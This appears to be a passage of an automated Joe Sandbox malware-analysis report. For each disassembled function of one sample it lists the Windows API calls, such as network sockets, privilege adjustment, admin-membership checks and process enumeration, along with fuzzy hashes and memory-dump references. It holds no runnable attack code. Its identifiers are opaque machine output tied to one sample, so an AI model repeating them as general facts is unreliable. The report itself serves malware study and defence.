                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                        • String ID:
                                        • API String ID: 1279440585-0
                                        • Opcode ID: b52a43cfb1d44a7af2222d4f942ee4bcf9a1bcf69368d076bf8751cd241d6b05
                                        • Instruction ID: 4ff7aba5d7bd49bb2504ef7cc8e1818ada7f3d0c34d9e83e893f35d65b9bddd0
                                        • Opcode Fuzzy Hash: b52a43cfb1d44a7af2222d4f942ee4bcf9a1bcf69368d076bf8751cd241d6b05
                                        • Instruction Fuzzy Hash: 842159316002089FCB10AF64CC85B7AB7E9EF48724F159169EA5AF72D2CB70AD059B51
                                        Function 00E81287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00E819FA
                                        • GetSysColor.USER32(0000000F), ref: 00E81A4E
                                        • SetBkColor.GDI32(?,00000000), ref: 00E81A61
                                          • Part of subcall function 00E81290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ColorDialogNtdllProc_$LongWindow
                                        • String ID:
                                        • API String ID: 591255283-0
                                        • Opcode ID: 721152126d1275f327bf183bc52f1511df6def03db8cf70b5e7664fd36c2b523
                                        • Instruction ID: 4ff70c277bef3453c546c28690e2d9c2e1a451972d94988262c28d8bdefea839
                                        • Opcode Fuzzy Hash: 721152126d1275f327bf183bc52f1511df6def03db8cf70b5e7664fd36c2b523
                                        • Instruction Fuzzy Hash: 87A11771105588FAD62CBB28DC95DFB399CDB82349B14229EF40EF61D2DA548D03A3B2
                                        Function 00EF6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 00EF6AB1
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF6ADA
                                        • bind.WS2_32(00000000,?,00000010), ref: 00EF6B13
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF6B20
                                        • closesocket.WS2_32(00000000), ref: 00EF6B34
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 99427753-0
                                        • Opcode ID: 43b9c7e7210a16d20d9bcfc92781589112f2ae99daeb4d33b1dc93186cb35680
                                        • Instruction ID: 89a31da116a35dceefd4b3d06fbfda795def3d883fc95bf70c42d1debfbf334d
                                        • Opcode Fuzzy Hash: 43b9c7e7210a16d20d9bcfc92781589112f2ae99daeb4d33b1dc93186cb35680
                                        • Instruction Fuzzy Hash: 3941AF75A40214AFEB10BF64DC86F7E77E8AB48720F449058FA5EBB2D3DA709D018791
                                        Function 00F055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 91a1a5ed6caa6d0d8613d5354a9dd7c4b7a414c2fa853b8796c7ce270c0e9362
                                        • Instruction ID: 42768388e79cf5278e597434aac8dab01ce9a80fd11b02404b63ee2953373951
                                        • Opcode Fuzzy Hash: 91a1a5ed6caa6d0d8613d5354a9dd7c4b7a414c2fa853b8796c7ce270c0e9362
                                        • Instruction Fuzzy Hash: 0811C432B009146FEB316F26DC44B2F779CFF84B21B444429F80AD7281CBB19901EEA5
                                        Function 00EFF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00EFF151
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00EFF15F
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00EFF21F
                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EFF22E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                        • String ID:
                                        • API String ID: 2576544623-0
                                        • Opcode ID: 6c528f025a1c837d20009c69c54f13c29408283c07653558bfa1c9304cc8afe5
                                        • Instruction ID: 8c2119b2cf4886b11e05c0f2c26af28078c77b2b859996fdd8185c6d083b89db
                                        • Opcode Fuzzy Hash: 6c528f025a1c837d20009c69c54f13c29408283c07653558bfa1c9304cc8afe5
                                        • Instruction Fuzzy Hash: C0516E715043059FD314EF20DC85A6BB7E8FF98710F54582DF59AA72A2EB70E908CB92
                                        Function 00F0C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • GetCursorPos.USER32(?), ref: 00F0C7C2
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EBBBFB,?,?,?,?,?), ref: 00F0C7D7
                                        • GetCursorPos.USER32(?), ref: 00F0C824
                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EBBBFB,?,?,?), ref: 00F0C85E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                        • String ID:
                                        • API String ID: 1423138444-0
                                        • Opcode ID: afb79e542cba62024e308f2a5512a6459d59a97d53dda233f19f9295278c050d
                                        • Instruction ID: 6371b93bf638c5091be895eb6eacc32caaeddaebca20c331e3f4f5c0a2feb8de
                                        • Opcode Fuzzy Hash: afb79e542cba62024e308f2a5512a6459d59a97d53dda233f19f9295278c050d
                                        • Instruction Fuzzy Hash: 0B318135500018AFCB25CF58C898EEA7BF6EB0A320F044169F905872A1D7315950FBA4
                                        Function 00EE40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE40D1
                                        • _memset.LIBCMT ref: 00EE40F2
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE4144
                                        • CloseHandle.KERNEL32(00000000), ref: 00EE414D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: 5faf38cc6f49fbda057e66270cff5f66068480b7e7f4e4d6cd7732ba7ec5a93a
                                        • Instruction ID: 0e61f776d0e3d78d9406a077d06948681a666108a6a5307a144b9754009d1b26
                                        • Opcode Fuzzy Hash: 5faf38cc6f49fbda057e66270cff5f66068480b7e7f4e4d6cd7732ba7ec5a93a
                                        • Instruction Fuzzy Hash: C011AB7590122C7AD7309BA5AC4DFABBB7CEF45764F1041A6F908E7180D6744E848BA4
                                        Function 00E81290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                                        • GetClientRect.USER32(?,?), ref: 00EBB84B
                                        • GetCursorPos.USER32(?), ref: 00EBB855
                                        • ScreenToClient.USER32(?,?), ref: 00EBB860
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                        • String ID:
                                        • API String ID: 1010295502-0
                                        • Opcode ID: 25ad7c0553aec00b79194418630ed55bb130a828cd4abec8dca053cdd1fc0ddb
                                        • Instruction ID: f9caeaedd3ad5a3fe00a36f58569050d5813179691cb806e8b0e0df135a1f669
                                        • Opcode Fuzzy Hash: 25ad7c0553aec00b79194418630ed55bb130a828cd4abec8dca053cdd1fc0ddb
                                        • Instruction Fuzzy Hash: A4113635A0011DAFCB10EFA8D8859FE77BCFB05310F000496FA09E7261D730BA56ABA5
                                        Function 00EF25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EF1AFE,00000000), ref: 00EF26D5
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EF270C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        • API String ID: 599397726-0
                                        • Opcode ID: c4b4e68197b342fd434e53c6206e8a27a747c99f6fd8e3c4496936f42cab4fc6
                                        • Instruction ID: cfaf21938d6db9ff6aad796c2f18cfa734f10429f794df11fad81142b9591300
                                        • Opcode Fuzzy Hash: c4b4e68197b342fd434e53c6206e8a27a747c99f6fd8e3c4496936f42cab4fc6
                                        • Instruction Fuzzy Hash: 6941C27190020DBFEB20DA54CC85EBBB7ECEB44758F10506EF701B6180EB71AE419655
                                        Function 00EEB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEB5AE
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EEB608
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EEB655
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 0b45cbb40a3d44cbea018c628e09050041e4637082f59a30ecf20f7fdeda5721
                                        • Instruction ID: 7c9adc8740f412e9f912c380613956f9f3d3e422b88a89df99e39383a81b3542
                                        • Opcode Fuzzy Hash: 0b45cbb40a3d44cbea018c628e09050041e4637082f59a30ecf20f7fdeda5721
                                        • Instruction Fuzzy Hash: 0B213275A0051CEFCB00EF95D884AADBBF8FF48314F1480AAE949AB351DB319955CB51
                                        Function 00ED8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                                        • GetLastError.KERNEL32 ref: 00ED8D47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                        • String ID:
                                        • API String ID: 1922334811-0
                                        • Opcode ID: 82492873634415c1296a9dab8b3c639c2c60a1b6dd92fcd17870985aa219c76b
                                        • Instruction ID: ddf8391c26c1bdecff151c3bbd4de05362cb4def19c3829291a12fee2198b7c5
                                        • Opcode Fuzzy Hash: 82492873634415c1296a9dab8b3c639c2c60a1b6dd92fcd17870985aa219c76b
                                        • Instruction Fuzzy Hash: EA11CEB1514208AFE728EF64DD85D6BB7FDFB08710B20852EF456A7681EB30BC418A20
                                        Function 00EE4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE4C2C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EE4C43
                                        • FreeSid.ADVAPI32(?), ref: 00EE4C53
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: 416c073cb0fa2dd3782fb245102799e3fc5b6fbaf581fdd1ad38304888c8082b
                                        • Instruction ID: a5d3660b7dd33a8196ea3e48b2df11d83859913967dc8125c8a554d6e539f1a1
                                        • Opcode Fuzzy Hash: 416c073cb0fa2dd3782fb245102799e3fc5b6fbaf581fdd1ad38304888c8082b
                                        • Instruction Fuzzy Hash: B7F04975A1130CBFEF04DFF0DC89AAEBBBCFF08301F1044A9A901E2581E6746A089B50
                                        Function 00E8E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 498de65df809fb4f3c0900a5fb481f6bbebc5d8277bc19f57a244d3a957db620
                                        • Instruction ID: 2d3077b11a46eb7f437cd6c924cb4a7998b3c3e968f18d79c249e34cf9671da6
                                        • Opcode Fuzzy Hash: 498de65df809fb4f3c0900a5fb481f6bbebc5d8277bc19f57a244d3a957db620
                                        • Instruction Fuzzy Hash: 26228A74A00216CFDB24EF64C584AAAB7F0FF09304F149469E85EBB351E771AD85CB91
                                        Function 00E816DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        • GetParent.USER32(?), ref: 00EBBA0A
                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00E819B3,?,?,?,00000006,?), ref: 00EBBA84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogNtdllParentProc_
                                        • String ID:
                                        • API String ID: 314495775-0
                                        • Opcode ID: 7886679f19463a4f0c9b6036718bacdd64df10a3ccf90665d24624386e916119
                                        • Instruction ID: e4177cf55b5140af63cfad540227d8d0020ebc9cd9a6a5e58c4175165fa9c69a
                                        • Opcode Fuzzy Hash: 7886679f19463a4f0c9b6036718bacdd64df10a3ccf90665d24624386e916119
                                        • Instruction Fuzzy Hash: 8F218734600104AFCB219B28C884DE93BD6AF0B328F5452A9F51D7B2F1C7715D52A751
                                        Function 00EEC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EEC966
                                        • FindClose.KERNEL32(00000000), ref: 00EEC996
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 0f85d7fd1cd072f86580eedf78a1beb46bbd24c11ab5fe631f82ee48521b1f30
                                        • Instruction ID: 9727fba12dd3a27d2db8033c6ff1fc81479a0cf64873becd3186bcba86bbe390
                                        • Opcode Fuzzy Hash: 0f85d7fd1cd072f86580eedf78a1beb46bbd24c11ab5fe631f82ee48521b1f30
                                        • Instruction Fuzzy Hash: 791161726106049FD710EF29D845A2AF7E9FF84324F14955EF9AAE7292DB30AC05CB81
                                        Function 00F0C86D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                        Download Yara Rule
